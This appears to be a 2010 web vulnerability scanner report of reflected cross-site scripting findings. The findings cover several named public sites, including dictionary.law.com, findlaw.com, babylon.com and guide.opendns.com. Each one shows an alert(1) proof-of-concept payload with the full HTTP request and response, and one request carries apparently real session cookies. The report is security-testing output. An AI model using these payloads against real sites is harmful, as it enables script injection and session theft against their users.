P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 29 Nov 2010 16:56:14 GMT
Pragma: no-cache
Content-Length: 4324
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ads.bluelithium.com/imp?20fa0"-alert(1)-"f46a6512895=1&Z=300x250&s=844600&_salt=1802580314";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Ar
...[SNIP]...

1.2. http://california.uscity.net/Anger_Management/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://california.uscity.net
Path:   /Anger_Management/x22

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dd0a1<script>alert(1)</script>7fa8af8449b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Anger_Managementdd0a1<script>alert(1)</script>7fa8af8449b/x22 HTTP/1.1
Host: california.uscity.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 403 Forbidden
Date: Mon, 29 Nov 2010 16:58:10 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 7273

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD><TITLE>403 Forbidden</TITLE>
<META content="403 Forbidden" name=description>
<META content=TRUE name=MSSmartTagsPreventParsing>

<link re
...[SNIP]...
<br>

Requested File: http://california.uscity.net/Anger_Managementdd0a1<script>alert(1)</script>7fa8af8449b/x22 <br>
...[SNIP]...

1.3. http://california.uscity.net/Anger_Management/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://california.uscity.net
Path:   /Anger_Management/x22

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cef15<script>alert(1)</script>d60065b328a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Anger_Management/x22cef15<script>alert(1)</script>d60065b328a HTTP/1.1
Host: california.uscity.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 403 Forbidden
Date: Mon, 29 Nov 2010 16:58:11 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 7273

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD><TITLE>403 Forbidden</TITLE>
<META content="403 Forbidden" name=description>
<META content=TRUE name=MSSmartTagsPreventParsing>

<link re
...[SNIP]...
<br>

Requested File: http://california.uscity.net/Anger_Management/x22cef15<script>alert(1)</script>d60065b328a <br>
...[SNIP]...

1.4. http://california.uscity.net/Anger_Management/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://california.uscity.net
Path:   /Anger_Management/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8e3a2<script>alert(1)</script>56ad1e30ea3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Anger_Management/x22?8e3a2<script>alert(1)</script>56ad1e30ea3=1 HTTP/1.1
Host: california.uscity.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 403 Forbidden
Date: Mon, 29 Nov 2010 16:58:10 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 7276

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD><TITLE>403 Forbidden</TITLE>
<META content="403 Forbidden" name=description>
<META content=TRUE name=MSSmartTagsPreventParsing>

<link re
...[SNIP]...
<br>

Requested File: http://california.uscity.net/Anger_Management/x22?8e3a2<script>alert(1)</script>56ad1e30ea3=1 <br>
...[SNIP]...

1.5. http://dictionary.babylon.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dictionary.babylon.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 440dc"><img%20src%3da%20onerror%3dalert(1)>04572a4607b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 440dc"><img src=a onerror=alert(1)>04572a4607b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?440dc"><img%20src%3da%20onerror%3dalert(1)>04572a4607b=1 HTTP/1.1
Host: dictionary.babylon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 16:58:29 GMT
Server: Apache
Set-Cookie: visitorID=1291049909-1149849571; expires=Sat, 28-May-2011 16:58:29 GMT; path=/; domain=babylon.com
Set-Cookie: PHPSESSID=uhs91gp92ms3bjfcm7g5v3rpq1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affilID=66515; expires=Wed, 29-Dec-2010 16:58:29 GMT; path=/; domain=babylon.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 17239


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>?440dc"><img src=a
...[SNIP]...
<meta name="Description" content="Definition of ?440dc"><img src=a onerror=alert(1)>04572a4607b=1" />
...[SNIP]...

1.6. http://dictionary.babylon.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dictionary.babylon.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5aa5f<img%20src%3da%20onerror%3dalert(1)>9992f2415fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5aa5f<img src=a onerror=alert(1)>9992f2415fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?5aa5f<img%20src%3da%20onerror%3dalert(1)>9992f2415fe=1 HTTP/1.1
Host: dictionary.babylon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 16:58:31 GMT
Server: Apache
Set-Cookie: visitorID=1291049911-835240236; expires=Sat, 28-May-2011 16:58:31 GMT; path=/; domain=babylon.com
Set-Cookie: PHPSESSID=u87hlkk40hbi8drjcbmjj5uug1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affilID=66515; expires=Wed, 29-Dec-2010 16:58:31 GMT; path=/; domain=babylon.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 17151


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>?5aa5f<img src=a on
...[SNIP]...
<li>Definition of ?5aa5f<img src=a onerror=alert(1)>9992f2415fe=1</li>
...[SNIP]...

1.7. http://dictionary.law.com/default2.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dictionary.law.com
Path:   /default2.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5d09"-alert(1)-"87da286f20 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /default2.asp?b5d09"-alert(1)-"87da286f20=1 HTTP/1.1
Host: dictionary.law.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 29 Nov 2010 16:58:30 GMT
X-Powered-By: ASP.NET
Connection: close
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19264


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="docHead"><meta
...[SNIP]...
media.hitbox.com";

//BEGIN EDITABLE SECTION
//CONFIGURATION VARIABLES
hbx.acct="DM541231C3NS64EN3";//ACCOUNT NUMBER(S)

hbx.pn=_hbxStrip("dictionary.com");//PAGE NAME(S)


hbx.mlc=_hbxStrip("b5d09"-alert(1)-"87da286f20=1");//MULTI-LEVEL CONTENT CATEGORY


hbx.pndef="title";//DEFAULT PAGE NAME
//hbx.pndef="filename";//DEFAULT PAGE NAME

//hbx.ctdef="full";//DEFAULT CONTENT CATEGORY
hbx.ctdef="current";//DEFAUL
...[SNIP]...

1.8. http://dictionary.law.com/default2.asp [submit1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dictionary.law.com
Path:   /default2.asp

Issue detail

The value of the submit1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44976"-alert(1)-"39fe846e8ad was submitted in the submit1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /default2.asp?typed=ASSET&type=1&submit1.x=62&submit1.y=13&submit1=Look+up44976"-alert(1)-"39fe846e8ad HTTP/1.1
Host: dictionary.law.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 29 Nov 2010 16:58:57 GMT
X-Powered-By: ASP.NET
Connection: close
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19740


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="docHead"><meta
...[SNIP]...
ION VARIABLES
hbx.acct="DM541231C3NS64EN3";//ACCOUNT NUMBER(S)

hbx.pn=_hbxStrip("dictionary.com");//PAGE NAME(S)


hbx.mlc=_hbxStrip("typed=ASSET&type=1&submit1.x=62&submit1.y=13&submit1=Look+up44976"-alert(1)-"39fe846e8ad");//MULTI-LEVEL CONTENT CATEGORY


hbx.pndef="title";//DEFAULT PAGE NAME
//hbx.pndef="filename";//DEFAULT PAGE NAME

//hbx.ctdef="full";//DEFAULT CONTENT CATEGORY
hbx.ctdef="current";//DEFAULT
...[SNIP]...

1.9. http://dictionary.law.com/default2.asp [submit1.x parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dictionary.law.com
Path:   /default2.asp

Issue detail

The value of the submit1.x request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2ed2"-alert(1)-"1aceecaa9e2 was submitted in the submit1.x parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /default2.asp?typed=ASSET&type=1&submit1.x=62b2ed2"-alert(1)-"1aceecaa9e2&submit1.y=13&submit1=Look+up HTTP/1.1
Host: dictionary.law.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 29 Nov 2010 16:58:46 GMT
X-Powered-By: ASP.NET
Connection: close
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19740


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="docHead"><meta
...[SNIP]...
DITABLE SECTION
//CONFIGURATION VARIABLES
hbx.acct="DM541231C3NS64EN3";//ACCOUNT NUMBER(S)

hbx.pn=_hbxStrip("dictionary.com");//PAGE NAME(S)


hbx.mlc=_hbxStrip("typed=ASSET&type=1&submit1.x=62b2ed2"-alert(1)-"1aceecaa9e2&submit1.y=13&submit1=Look+up");//MULTI-LEVEL CONTENT CATEGORY


hbx.pndef="title";//DEFAULT PAGE NAME
//hbx.pndef="filename";//DEFAULT PAGE NAME

//hbx.ctdef="full";//DEFAULT CONTENT CATEGORY
h
...[SNIP]...

1.10. http://dictionary.law.com/default2.asp [submit1.y parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dictionary.law.com
Path:   /default2.asp

Issue detail

The value of the submit1.y request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4767"-alert(1)-"7aa955ca2a6 was submitted in the submit1.y parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /default2.asp?typed=ASSET&type=1&submit1.x=62&submit1.y=13b4767"-alert(1)-"7aa955ca2a6&submit1=Look+up HTTP/1.1
Host: dictionary.law.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 29 Nov 2010 16:58:51 GMT
X-Powered-By: ASP.NET
Connection: close
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19740


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="docHead"><meta
...[SNIP]...
ON
//CONFIGURATION VARIABLES
hbx.acct="DM541231C3NS64EN3";//ACCOUNT NUMBER(S)

hbx.pn=_hbxStrip("dictionary.com");//PAGE NAME(S)


hbx.mlc=_hbxStrip("typed=ASSET&type=1&submit1.x=62&submit1.y=13b4767"-alert(1)-"7aa955ca2a6&submit1=Look+up");//MULTI-LEVEL CONTENT CATEGORY


hbx.pndef="title";//DEFAULT PAGE NAME
//hbx.pndef="filename";//DEFAULT PAGE NAME

//hbx.ctdef="full";//DEFAULT CONTENT CATEGORY
hbx.ctdef="cur
...[SNIP]...

1.11. http://dictionary.law.com/default2.asp [typed parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dictionary.law.com
Path:   /default2.asp

Issue detail

The value of the typed request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 189a5"-alert(1)-"7c7e3621436 was submitted in the typed parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /default2.asp?typed=ASSET189a5"-alert(1)-"7c7e3621436&type=1&submit1.x=62&submit1.y=13&submit1=Look+up HTTP/1.1
Host: dictionary.law.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 29 Nov 2010 16:58:35 GMT
X-Powered-By: ASP.NET
Connection: close
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 18615


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="docHead"><meta
...[SNIP]...
x.com";

//BEGIN EDITABLE SECTION
//CONFIGURATION VARIABLES
hbx.acct="DM541231C3NS64EN3";//ACCOUNT NUMBER(S)

hbx.pn=_hbxStrip("dictionary.com");//PAGE NAME(S)


hbx.mlc=_hbxStrip("typed=ASSET189a5"-alert(1)-"7c7e3621436&type=1&submit1.x=62&submit1.y=13&submit1=Look+up");//MULTI-LEVEL CONTENT CATEGORY


hbx.pndef="title";//DEFAULT PAGE NAME
//hbx.pndef="filename";//DEFAULT PAGE NAME

//hbx.ctdef="full";//DEFAULT
...[SNIP]...

1.12. http://dictionary.lp.findlaw.com/scripts/search.pl [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dictionary.lp.findlaw.com
Path:   /scripts/search.pl

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 16125<script>alert(1)</script>005c3488dd3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /scripts/search.pl?16125<script>alert(1)</script>005c3488dd3=1 HTTP/1.1
Host: dictionary.lp.findlaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 16:58:31 GMT
Server: Apache/1.3.29 (Unix) mod_jk/1.1.0 mod_perl/1.29
Set-Cookie: FindLawTP=TOMPA-Primary-174.122.23.218-23327-1291049911-697973-1817-APMOT; domain=.findlaw.com; path=/; expires=Tue, 29-Nov-11 16:58:31 GMT
Cache-Control: max-age=86400, max-age=86400
Expires: Tue, 30 Nov 2010 16:58:31 GMT
Connection: close
Content-Type: text/html
Content-Length: 13349

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html;charset
...[SNIP]...
<B>16125<script>alert(1)</script>005c3488dd3=1</b>
...[SNIP]...

1.13. http://dictionary.lp.findlaw.com/scripts/search.pl [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dictionary.lp.findlaw.com
Path:   /scripts/search.pl

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb66f"><script>alert(1)</script>c023226bea0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /scripts/search.pl?cb66f"><script>alert(1)</script>c023226bea0=1 HTTP/1.1
Host: dictionary.lp.findlaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 16:58:30 GMT
Server: Apache/1.3.29 (Unix) mod_jk/1.1.0 mod_perl/1.29
Set-Cookie: FindLawTP=TOMPA-Primary-174.122.23.218-31762-1291049910-990620-1671-APMOT; domain=.findlaw.com; path=/; expires=Tue, 29-Nov-11 16:58:30 GMT
Cache-Control: max-age=86400, max-age=86400
Expires: Tue, 30 Nov 2010 16:58:30 GMT
Connection: close
Content-Type: text/html
Content-Length: 13355

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html;charset
...[SNIP]...
<a href="http://login.findlaw.com/scripts/register?dest=/scripts/search.pl?cb66f"><script>alert(1)</script>c023226bea0=1">
...[SNIP]...

1.14. http://dictionary.lp.findlaw.com/scripts/search.pl [s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dictionary.lp.findlaw.com
Path:   /scripts/search.pl

Issue detail

The value of the s request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 931e9"><script>alert(1)</script>ad0cf17018 was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /scripts/search.pl?s=asset931e9"><script>alert(1)</script>ad0cf17018 HTTP/1.1
Host: dictionary.lp.findlaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 16:58:31 GMT
Server: Apache/1.3.29 (Unix) mod_jk/1.1.0 mod_perl/1.29
Set-Cookie: FindLawTP=TOMPA-Primary-174.122.23.218-31802-1291049911-813966-1723-APMOT; domain=.findlaw.com; path=/; expires=Tue, 29-Nov-11 16:58:31 GMT
Cache-Control: max-age=86400, max-age=86400
Expires: Tue, 30 Nov 2010 16:58:31 GMT
Connection: close
Content-Type: text/html
Content-Length: 13365

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html;charset
...[SNIP]...
<a href="http://login.findlaw.com/scripts/register?dest=/scripts/search.pl?s=asset931e9"><script>alert(1)</script>ad0cf17018">
...[SNIP]...

1.15. http://dictionary.lp.findlaw.com/scripts/search.pl [s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dictionary.lp.findlaw.com
Path:   /scripts/search.pl

Issue detail

The value of the s request parameter is copied into the HTML document as plain text between tags. The payload 66e0b<script>alert(1)</script>442084ce5d7 was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /scripts/search.pl?s=asset66e0b<script>alert(1)</script>442084ce5d7 HTTP/1.1
Host: dictionary.lp.findlaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 16:58:33 GMT
Server: Apache/1.3.29 (Unix) mod_jk/1.1.0 mod_perl/1.29
Set-Cookie: FindLawTP=TOMPA-Primary-174.122.23.218-23290-1291049913-40615-1752-APMOT; domain=.findlaw.com; path=/; expires=Tue, 29-Nov-11 16:58:33 GMT
Cache-Control: max-age=86400, max-age=86400
Expires: Tue, 30 Nov 2010 16:58:33 GMT
Connection: close
Content-Type: text/html
Content-Length: 13362

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html;charset
...[SNIP]...
<B>asset66e0b<script>alert(1)</script>442084ce5d7</b>
...[SNIP]...

1.16. http://guide.opendns.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guide.opendns.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54163"><script>alert(1)</script>3430e8b065a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 54163\"><script>alert(1)</script>3430e8b065a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?url=advancedmags%2Ecom&servfail&54163"><script>alert(1)</script>3430e8b065a=1 HTTP/1.1
Host: guide.opendns.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207386316.00012306182230551517:3:1; __utmxx=207386316.00012306182230551517:1774337:2592000; __utmz=207386316.1290264528.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207386316.633541220.1290264528.1290264528.1290264528.1; OPENDNS_ACCOUNT=05ac4ddebab905eed8c88999fa18bb80; OUN=m7PsKwIJcKYMvq1Mcmca8ErKsy7gUMliFZtnhIcTeYEfDFi%2FLKrtpFf%2FnhOY7xPYbwM7oqMT0lRSv6jNwyns7IGjxJG4T5kWvFRZCZS51akAp0EDEXguqEV%2Fa%2BhBQG7c5OQqfjcWJJBMU71JluOvBvv3gVCVfwdG; t=0-1298937600; LPUID=46e52ed1-9c3b-c374-31b5-d84715b8ceb4; __qca=P0-2135470522-1290702286339; fpc10002134856462=bmVcHWxK|7EROHGOKaa|fses10002134856462=|U0QMKvOKaa|bmVcHWxK|fvis10002134856462=ZT1odHRwJTNBJTJGJTJGZ3VpZGUub3BlbmRucy5jb20lMkYlM0YmZj1odHRwJTNBJTJGJTJGZ3VpZGUub3BlbmRucy5jb20lMkZtYWluJTNGdXJsJTNEd2F0ZXJsb29ra2lvc2suY29tJmI9T3BlbkROUw==|8s7YH77Too|8s7YH77Too|8s7YH77Too|s|8s7YH77Too|8s7YH77Too

Response

HTTP/1.0 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=utf-8
Pragma: no-cache
Set-Cookie: OUS=deleted; expires=Sun, 29-Nov-2009 16:29:07 GMT; path=/; domain=.opendns.com
Content-Length: 1403
Connection: close
Date: Mon, 29 Nov 2010 16:29:08 GMT
Server: OpenDNS Guide

<html>
   <head>
       <title> </title>
       <script type="text/javascript">
       function bredir(d,u,r,v,c){var w,h,wd,hd,bi;var b=false;var p=false;var s=[[300,250,false],[250,250,false],[240,400,false],[336,2
...[SNIP]...
<iframe frameborder="0" src="/main?url=advancedmags.com&servfail=&54163\"><script>alert(1)</script>3430e8b065a=1" width="100%" height="100%">
...[SNIP]...

1.17. http://guide.opendns.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guide.opendns.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14981"><script>alert(1)</script>3ec9547041e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 14981\"><script>alert(1)</script>3ec9547041e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?url=advancedmags%2Ecom&servfail&14981"><script>alert(1)</script>3ec9547041e=1 HTTP/1.1
Host: guide.opendns.com
Proxy-Connection: keep-alive
